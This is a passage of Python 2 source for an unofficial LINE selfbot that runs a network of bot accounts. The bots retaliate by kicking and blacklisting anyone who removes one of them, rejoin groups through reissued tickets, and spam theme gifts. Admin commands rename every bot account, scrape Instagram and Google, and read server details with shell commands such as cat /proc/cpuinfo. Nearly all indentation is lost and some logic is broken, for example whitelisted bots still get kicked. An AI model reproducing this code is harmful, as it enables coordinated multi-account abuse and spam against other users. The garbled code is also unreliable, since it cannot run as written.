ke.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
                        print ("Could not kick ["+op.param2+"] from group ["+op.param1+"] because of a kick restriction or because the client is not in the group. Adding to blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kd.getGroup(op.param1)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
kf.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
                        print ("Could not kick ["+op.param2+"] from group ["+op.param1+"] because of a kick restriction or because the client is not in the group. Adding to blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ke.getGroup(op.param1)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ticket = ke.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#========================================================================
if Fmid in op.param3:
if op.param2 in Bots and admin:
pass
try:
kg.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
                        print ("Could not kick ["+op.param2+"] from group ["+op.param1+"] because of a kick restriction or because the client is not in the group. Adding to blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kg.getGroup(op.param1)
X.preventJoinByTicket = False
kg.updateGroup(X)
Ti = kg.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kf.getGroup(op.param1)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ticket = kf.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
kh.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
                        print ("Could not kick ["+op.param2+"] from group ["+op.param1+"] because of a kick restriction or because the client is not in the group. Adding to blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kh.getGroup(op.param1)
X.preventJoinByTicket = False
kh.updateGroup(X)
Ti = kh.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kg.getGroup(op.param1)
X.preventJoinByTicket = True
kg.updateGroup(X)
Ticket = kg.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
kj.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
                        print ("Could not kick ["+op.param2+"] from group ["+op.param1+"] because of a kick restriction or because the client is not in the group. Adding to blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kj.getGroup(op.param1)
X.preventJoinByTicket = False
kj.updateGroup(X)
Ti = kj.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kh.getGroup(op.param1)
X.preventJoinByTicket = True
kh.updateGroup(X)
Ticket = kh.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Jmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
                        print ("Could not kick ["+op.param2+"] from group ["+op.param1+"] because of a kick restriction or because the client is not in the group. Adding to blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kj.getGroup(op.param1)
X.preventJoinByTicket = True
kj.updateGroup(X)
Ticket = kj.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Nmid in op.param3:
if op.param2 in Bots:
pass
try:
ko.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
                        print ("Could not kick ["+op.param2+"] from group ["+op.param1+"] because of a kick restriction or because the client is not in the group. Adding to blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ko.getGroup(op.param1)
G.preventJoinByTicket = False
ko.updateGroup(G)
Ti = ko.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kn.getGroup(op.param1)
X.preventJoinByTicket = True
kn.updateGroup(X)
Ti = kn.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#============================================================================
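        # op.type 13 (invitation to this account): honour the autoJoin / autoCancel settings
        # and cancel invitations issued by blacklisted users.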
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
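        # op.type 22 / 24: room events - leave the room automatically when leaveRoom is enabled.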
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
            if msg.from_ in admin:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
                url = msg.contentMetadata["postEndUrl"]  # expected format: line://home/post?userMid=<mid>&postId=<id>
cl.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1001)
kk.like(url[25:58], url[66:], likeType=1001)
kc.like(url[25:58], url[66:], likeType=1001)
kt.like(url[25:58], url[66:], likeType=1001)
ks.like(url[25:58], url[66:], likeType=1001)
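        # op.type 25: message operation - admin command interface (blacklist management,
        # group tools, profile changes, media search, text-to-speech, ...).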
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already in the blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"successfully load users into the blacklist")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"successfully removed from the blacklist")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + msg.contentMetadata["displayName"] + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Message :\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メTamii々•┅─────")
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
                    cl.sendText(msg.to,"⎈ Profile Name :\n" + contact.displayName + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Message :\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メTamii々•┅─────")
elif msg.contentType == 16:
if wait["contact"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Help","help"]:
if msg.from_ in admin:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage + datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Textspeech","textspeech","TextSpeech"]:
if msg.from_ in admin:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, textspeech + datetime.today().strftime('%H:%M:%S'))
elif ("Group name:" in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Group name:","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite:" in msg.text:
if msg.from_ in admin:
                    midd = msg.text.replace("Invite:","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif msg.text.lower() == 'all bot':
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
kt.sendMessage(msg)
#=======================================================
elif msg.text in ["Me"]:
if msg.from_ in admin:
msg.contentType = 13
cl.sendText(msg.to,"add bossque")
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text.lower() == 'gift1':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '1'}
msg.text = None
cl.sendMessage(msg)
elif msg.text.lower() == 'gift2':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text.lower() == 'gift3':
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '3'}
msg.text = None
kk.sendMessage(msg)
elif msg.text.lower() == 'gift4':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '4'}
msg.text = None
kc.sendMessage(msg)
elif msg.text.lower() == 'gift5':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '5'}
msg.text = None
kd.sendMessage(msg)
elif msg.text.lower() == 'gift6':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}
msg.text = None
ke.sendMessage(msg)
elif msg.text.lower() == 'spam gift':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
cl.sendMessage(msg)
ks.sendMessage(msg)
kt.sendMessage(msg)
kt.sendMessage(msg)
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 9
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME', 'MSGTPL': '10'}
msg.text = None
                        cl.sendMessage(msg)
#==================================================
elif "All rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("All rename:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
                    cl.sendText(msg.to,"change name: "+string+"\nsuccess")
            elif 'allbio:' in msg.text.lower():
if msg.from_ in owner:
string = msg.text.lower().replace("allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kt.getProfile()
profile.statusMessage = string
kt.updateProfile(profile)
                    cl.sendText(msg.to,"successfully changed bio to: " + string)
elif "My name:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("My name:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
                        cl.sendText(msg.to,"change name: "+string+"\nsuccess")
elif "Bot2 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot2 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
                        ki.sendText(msg.to,"change name: "+string+"\nsuccess")
elif "Bot3 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot3 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
                        kc.sendText(msg.to,"change name: "+string+"\nsuccess")
elif "Bot4 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot4 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
                        kk.sendText(msg.to,"change name: "+string+"\nsuccess")
elif "Bot5 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot5 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
                        ks.sendText(msg.to,"change name: "+string+"\nsuccess")
elif "Bot6 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot6 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
                        kt.sendText(msg.to,"change name: "+string+"\nsuccess")
#==================================================
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
                            hasil = 'Song Lyrics ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'bot restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif msg.text.lower() == 'runtime':
if msg.from_ in admin:
eltime = time.time()
van = "Bot has been running for "+waktu(eltime)
cl.sendText(msg.to,van)
elif 'music ' in msg.text.lower():
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
                        hasil += 'Title : ' + song[0]
                        hasil += '\nDuration : ' + song[1]
                        hasil += '\nDownload Link : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
#elif 'instagram ' in msg.text.lower():
# try:
# instagram = msg.text.lower().replace("instagram ","")
# html = requests.get('https://www.instagram.com/' + instagram + '/?')
# soup = BeautifulSoup(html.text, 'html5lib')
# data = soup.find_all('meta', attrs={'property':'og:description'})
# text = data[0].get('content').split()
# data1 = soup.find_all('meta', attrs={'property':'og:image'})
# text1 = data1[0].get('content').split()
# user = "Name: " + text[-2] + "\n"
# user1 = "Username: " + text[-1] + "\n"
# followers = "Followers: " + text[0] + "\n"
# following = "Following: " + text[2] + "\n"
# post = "Post: " + text[4] + "\n"
# link = "Link: " + "https://www.instagram.com/" + instagram
# detail = "========INSTAGRAM INFO USER========\n"
# details = "\n========INSTAGRAM INFO USER========"
# cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
# cl.sendImageWithURL(msg.to, text1[0])
# cl.sendText("Follow yak Fast Follback ")
# except Exception as njer:
# cl.sendText(msg.to, str(njer))
elif 'instagram ' in msg.text.lower():
try:
instagram = msg.text.replace("instagram ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "========INSTAGRAM INFO USER========\n"
details = "\n========INSTAGRAM INFO USER========"
text = detail + "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link + details
cl.sendImageWithURL(msg.to, profileIG)
cl.sendText(msg.to, str(text))
except Exception as e:
cl.sendText(msg.to, str(e))
cl.sendText(msg.to,"Follow Fast Follback")
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
                cl.sendText(msg.to,"════FROM ID════\n" + kata + "\n════TO ENGLISH════\n" + result + "\n══════SUCCESS═════")
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
                                cl.sendText(msg.to,"There are no pending invitations.")
else:
                                cl.sendText(msg.to,"Sorry, there are no pending invitations")
else:
if wait["lang"] == "JP":
